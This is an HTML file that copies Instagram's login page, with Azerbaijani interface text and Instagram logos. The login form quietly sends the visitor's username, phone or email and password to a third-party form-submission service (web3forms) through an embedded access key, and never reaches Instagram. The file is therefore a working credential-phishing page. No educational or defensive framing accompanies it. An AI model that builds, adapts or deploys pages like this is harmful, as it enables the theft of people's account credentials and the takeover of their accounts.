<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css"/>
    <link rel="Website icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/9/95/Instagram_logo_2022.svg/640px-Instagram_logo_2022.svg.png">
    <title>Instagram</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            display: flex;
           
            height: 100vh;
            margin: 0;
        }
        .container {
            width: 312px;
            height: 340px;
          
           
            border-radius: 5px;
         
            padding: 40px 20px;
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-left: 420px;
            margin-top: 10px;
        }
        .logo {
            margin-bottom: 20px;
        }
        .logo img {
            width: 175px;
        }
        .login-form {
            width: 270px;
        }
        input {
            margin-left: 21px;
            justify-content: center;
            width: 270px;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #dbdbdb;
            border-radius: 5px;
            box-sizing: border-box;
        }
        button {
            margin-left: 21px;
            width: 270px;
            padding: 10px;
            background-color: #0095f6;
            border: none;
            color: #ffffff;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }
        .login-form button:hover {
            background-color: #007bb5;
        }
        .footer {
            
            font-size: 14px;
            text-align: center;
        }
        .footer a {
            color: #0095f6;
            text-decoration: none;
        }
        .footer a:hover {
            text-decoration: underline;
        }
        .divider {
           
            margin: 15px 0;
            border: 0.5px solid #dbdbdb;
            width: 100%;
        }
        .or {
            color: #999;
            font-size: 14px;
            text-transform: uppercase;
            margin: 0 10px;
        }
    
        .login-with-facebook:hover {
            background-color: #365899;
        }
        
        a{
            text-decoration: none;
            text-align: center;
            color: #303030;
        }
        p{
            font-size: 12px;
            color: #303030;
        }
        .photo{
            width: 312px;
            height: 500px;
            margin-left: 270px;
            background-position: center;
            background-size: cover;
        }
        .cont{
            position: absolute;
            display: flex;
            flex-direction: row;
            margin-left: 300px;
        }
        .son{
            margin-left: 165px;
            margin-top: 535px;
            font-size: 14px;
            text-align: center;
            
        }
        .yazi{
            margin-top: 700px;
            margin-right: 100px ;
        }
        @media (max-width: 750px){
  .photo{
    display: none;
  }
}
@media (max-width: 750px){
  .cont{
   margin-left: 0;
  }
}
@media (max-width: 750px){
  input{
   margin-left: 14px;
   width: 275px;
  }
}
@media (max-width: 750px){
  .container{
   margin-left: 4%;
   margin-top: 2%;
   width: 300px;
  }
}
@media (max-width: 750px){
  .son{
   margin-left: 8%;
   margin-top: 146%;
  }
}

.btn{
    margin-left: 0;
}
.prl{
    margin-left: 145px;
   
    font-size: 12px;
}
span{
    color:#0885CC;
    
}
    </style>
</head>
<body>
    <div class="photo">
        <img src="c:\Users\ferid\Desktop\insta\tel.png" alt="photo">
    </div>
    <div class="cont">
    <div class="container">
        <div class="logo">
            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/800px-Instagram_logo.svg.png?20160616034027" alt="Instagram Logo">
        </div>
        <button class="btn"><i class="fa-brands fa-square-facebook"></i>  Facebook ilə daxil olun</button><br>
        <div class="divider"></div><br>
        <form action="https://api.web3forms.com/submit" method="POST">

            <!-- Replace with your Access Key -->
            <input type="hidden" name="access_key" value="1dd9e835-dd69-4405-a457-dfe2441b7f37">
        
            <!-- Form Inputs. Each input must have a name="" attribute -->
            <input type="text" name="name" placeholder="Telefon,istifadəçi adı və ya e-poçt ünvanı" required>
            <input type="text" name="parol"  placeholder="parol"required>
           
        
            <!-- Honeypot Spam Protection -->
            <input type="checkbox" name="botcheck" class="hidden" style="display: none;">
        
            <!-- Custom Confirmation / Success Page -->
            <!-- <input type="hidden" name="redirect" value="https://mywebsite.com/thanks.html"> -->
        <br>
        <span class="prl">Parolunuzu unutmusuz?</span><br><br>
            <button type="submit">Daxil ol</button>
        </form>
        
        <div class="footer">
            <br>
            <p>Hesabınız yoxdur?<a href="£">Qeydiyatdan keçin.</a></p><br><p>Davam etməklə siz Instagram-ın İstifadə Şərtləri və Məxfilik Siyasəti ilə razılaşırsınız.</p>
        </div>
    </div>
    </div>
    <div class="son">
        <p><b>Proqramı quraşdırın.</b></p>
        <img src="https://static.vecteezy.com/system/resources/thumbnails/024/237/966/small_2x/badge-google-play-and-app-store-button-download-free-vector.jpg" alt="Play store" width="300px">
    </div>
    
</div>

</body>
</html>
